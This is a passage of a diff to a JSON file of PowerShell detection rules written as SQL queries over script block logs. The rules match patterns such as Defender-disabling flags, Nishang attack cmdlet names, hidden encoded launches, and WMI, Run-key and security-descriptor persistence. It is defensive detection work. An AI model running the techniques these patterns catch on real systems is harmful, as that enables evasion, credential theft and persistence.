('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "status": "test", + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Administrator script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", - "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate user creation" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6346,425 +6239,418 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" - ], - "filename": "posh_ps_automated_collection.yml" - }, - { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", - "status": "test", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR 